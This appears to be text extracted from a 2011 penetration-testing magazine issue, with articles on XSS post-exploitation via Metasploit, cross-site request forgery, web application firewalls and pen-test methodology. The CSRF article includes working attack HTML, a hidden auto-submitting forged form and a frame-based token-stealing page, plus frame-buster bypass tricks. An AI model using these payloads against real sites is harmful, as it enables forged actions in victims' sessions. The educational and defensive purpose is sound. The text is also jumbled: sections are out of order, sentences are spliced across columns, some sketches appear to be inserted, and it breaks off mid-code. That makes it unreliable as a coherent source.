Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
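As an illustration of the encoding step, the Ruby sketch below uses the standard library's CGI.escapeHTML; the `render_search` helper is a hypothetical name of mine, not from the article:

```ruby
require 'cgi'

# Encode user-controlled data before reflecting it back to the browser
# (hypothetical helper, mirroring the vulnerable search example earlier).
def render_search(search)
  "The parameter passed is #{CGI.escapeHTML(search)}"
end

render_search("<script>alert(1)</script>")
# => "The parameter passed is &lt;script&gt;alert(1)&lt;/script&gt;"
```

With the angle brackets turned into entities, the browser renders the payload as harmless text instead of executing it.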
Conclusion
In a nutshell, we can conclude that even a single parameter vulnerable to XSS can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvind.doraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approaches used by many web developers are CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a hidden form field and in the session at the same time.
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario: Listing 4.
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts access of browser-side programming languages, such as JavaScript, to remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way for web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
These tokens are kept in the webpage form's hidden field and in a session at the same time, so the two can be compared after the page form is submitted.
Subverting one-time tokens is usually attempted through brute force attacks, and brute forcing one-time tokens is useful only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
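The same idea rendered in Ruby (my own sketch: SecureRandom stands in for PHP's md5(uniqid(...)), and `issue_token`/`valid_token?` are hypothetical names). Consuming the stored value on comparison is what makes the token one-time:

```ruby
require 'securerandom'

# Issue a fresh token and remember it server-side
# (the session hash is a stand-in for real session storage).
def issue_token(session)
  session[:token] = SecureRandom.hex(16)
end

# Compare and consume: deleting the stored token makes it one-time.
def valid_token?(session, submitted)
  !session[:token].nil? && session.delete(:token) == submitted
end

session = {}
token = issue_token(session)
valid_token?(session, token)  # => true  (first use succeeds)
valid_token?(session, token)  # => false (replay fails: token consumed)
```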
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token: Listing 2.
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser: without JavaScript, the page simply stays hidden.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
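The attack in Listing 4 only works because the application's anti-CSRF token can be read across frames. The defensive side, a per-session synchronizer token, can be sketched in a few lines; the function names and the in-memory session store here are illustrative, not from the article:

```python
import hmac
import secrets

def issue_token(session_store, session_id):
    """Generate a random anti-CSRF token and remember it for this session."""
    token = secrets.token_hex(16)
    session_store[session_id] = token
    return token

def validate_token(session_store, session_id, submitted):
    """Reject the POST unless the submitted token matches the stored one."""
    expected = session_store.get(session_id)
    if expected is None:
        return False
    # constant-time comparison avoids leaking the token via timing
    return hmac.compare_digest(expected, submitted)
```

A server would call issue_token() when rendering the form and validate_token() on every state-changing POST; the tokens must still be kept unreadable to framed attacker pages, which is where the Same Origin Policy and frame protection come in.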
WEB APPLICATION CHECKING
Page 38-39, http://pentestmag.com, 01/2011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as quickly and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall will provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much they knew about it.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of downstream systems such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services will protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar technology adoption lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of peak vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire

The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example

Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure

There are two ways of actually securing the data and processes connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that has so far not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use only the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALFs) or Application-Level Gateways (ALGs). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably reduces the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to have its security functions checked by penetration testers. This might reveal, for example, that the system can be misused through SQL Injection by entering single quotes. It would be a costly procedure to correct this error in the web application itself; if a WAF is deployed as a protective system, it can instead be configured to filter the quotes out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis: that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
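The limits of pure character filtering can be shown with a toy example. Stripping single quotes defuses the classic string-context probe, but an injection into a numeric context never needed quotes in the first place, so the filter passes it through untouched. This is a deliberately naive sketch, not how a real WAF rule engine works:

```python
def strip_quotes(value: str) -> str:
    """A naive WAF-style rule: drop single quotes from user input."""
    return value.replace("'", "")

# The classic string-context probe is defused once its quotes are gone ...
classic = "' OR '1'='1"
assert "'" not in strip_quotes(classic)

# ... but a numeric-context payload contains no quotes at all,
# so the filter passes it through unchanged.
numeric = "1 OR 1=1"
assert strip_quotes(numeric) == numeric
```

This is exactly why the article warns that filtering special characters does not always prevent attacks based on the SQL Injection principle.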
WAF Functionality

A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
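Such general parameter rules (expected parameter set, maximum length, permitted characters) can be sketched as a small validator. The rule format and form name below are invented for illustration; real WAFs express this in their own policy language:

```python
import re

# Hypothetical per-form rules: expected parameters, max length, allowed pattern
RULES = {
    "login": {
        "params": {"user", "pass"},
        "max_len": 64,
        "pattern": re.compile(r"^[\w@.\-]*$"),
    }
}

def check_request(form_name, submitted):
    """Block requests with unexpected, oversized, or malformed parameters."""
    rule = RULES[form_name]
    if set(submitted) != rule["params"]:      # e.g. a third, injected parameter
        return False
    for value in submitted.values():
        if len(value) > rule["max_len"]:      # oversized value
            return False
        if not rule["pattern"].match(value):  # character outside the allowed set
            return False
    return True
```

A request with an extra parameter, an oversized value, or a quote character would be rejected before it ever reaches the application.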
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; it quickly becomes outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order entry page.
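The combined approach can be sketched as two passes: a learned whitelist profile for a high-value path, plus generic negative-security patterns applied everywhere. The paths, profile and patterns below are invented for illustration:

```python
import re

# Learned whitelist profile for a hypothetical high-value order page
WHITELIST = {"/order": {"item_id", "qty"}}

# Generic negative-security (blacklist) patterns applied to every request
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select", r"\.\./")]

def allow(path, params):
    """Whitelist check where a profile exists; blacklist check everywhere."""
    profile = WHITELIST.get(path)
    if profile is not None and set(params) - profile:
        return False                      # parameter not in the learned profile
    for value in params.values():
        if any(rx.search(value) for rx in BLACKLIST):
            return False                  # known-bad pattern anywhere
    return True
```

The order page rejects any parameter outside its learned profile, while pages without a profile still get the blacklist screen.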
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.

The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. And some special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks that attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured to match the respective conditions; penetration tests help with the correct configuration.
Demands on Penetration Testers

When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center that administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses that the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
WEB APP SECURITY
Page 14-15, http://pentestmag.com, 01/2011 (1) November
and allow similar instances of vulnerabilities to be found throughout the code.
How Web Application Pen Testing Works

Most web application penetration testing is carried out from security operations centers, where the resources under test are accessed remotely over the internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process, including the testing processes used to achieve the security vulnerability assessment, such as Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment. Some of these approaches are:

• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team does not have any inside information about the target environment, and the expected knowledge gain is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under testing is obtained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It is also important to point out that penetration testing can be carried out as two different types of testing:

• External Penetration Testing
• Internal Penetration Testing

Both types can be conducted with least information (black box) or with full information (white box).
Figure 2. The different phases of pen testing
Figure 3 shows different procedures and steps that can be used to conduct the penetration testing. The following are descriptions of these steps:
• Scope and Plan – In this step the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step the systems within the defined scope of the project are scanned: automated scanners examine the open ports and scan the systems to detect vulnerabilities, and hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage the penetration testing tools are selected, based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step the vulnerabilities are exploited using the automated tools, and the attack methods designed in the previous phase are used to conduct the following tests: data and service pilferage, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools

Throughout pen testing, a specific, structured methodology has to be followed, with steps such as Enumeration, Vulnerability Assessment and Exploitation. Some of the tools that might be used within these steps are:

• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It is also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
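The manual inspection of hidden fields mentioned above can be partly automated with nothing more than the standard library. A minimal sketch (the HTML sample is invented; real pages would be fetched over HTTP first):

```python
from html.parser import HTMLParser

class HiddenFieldFinder(HTMLParser):
    """Collect name/value pairs of hidden <input> fields in an HTML page."""
    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields.append((a.get("name"), a.get("value")))

# Invented sample page: a hidden price field is a classic
# hidden-field-tampering target.
page = """
<form action="/buy" method="POST">
  <input type="hidden" name="price" value="9.99">
  <input type="text" name="qty" value="1">
</form>
"""

finder = HiddenFieldFinder()
finder.feed(page)
print(finder.fields)  # [('price', '9.99')]
```

Any hidden field that carries server-trusted state (a price, a role, a token) is worth probing for tampering.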
Some of the areas that can be covered during the vulnerability assessment are the following:

• Input validation
• Access control
Figure 3. Testing techniques, procedures and steps
• Authentication and session management (session ID flaw) vulnerabilities
• Cross-Site Scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of Service (if required)
• Configuration management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client-side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause a Denial of Service condition; these are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing
Port Scanners

Such tools are used to gather information about which network services are available for connection on each target host. The port scanning tool usually examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to identify the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility of port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
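The connect-style probing these tools perform can be sketched in a few lines of Ruby. This is a minimal illustration, not any particular product's technique; the host, port list and timeout are arbitrary example values:

```ruby
require 'socket'
require 'timeout'

# Try a full TCP connect to each port; an accepted connection means the
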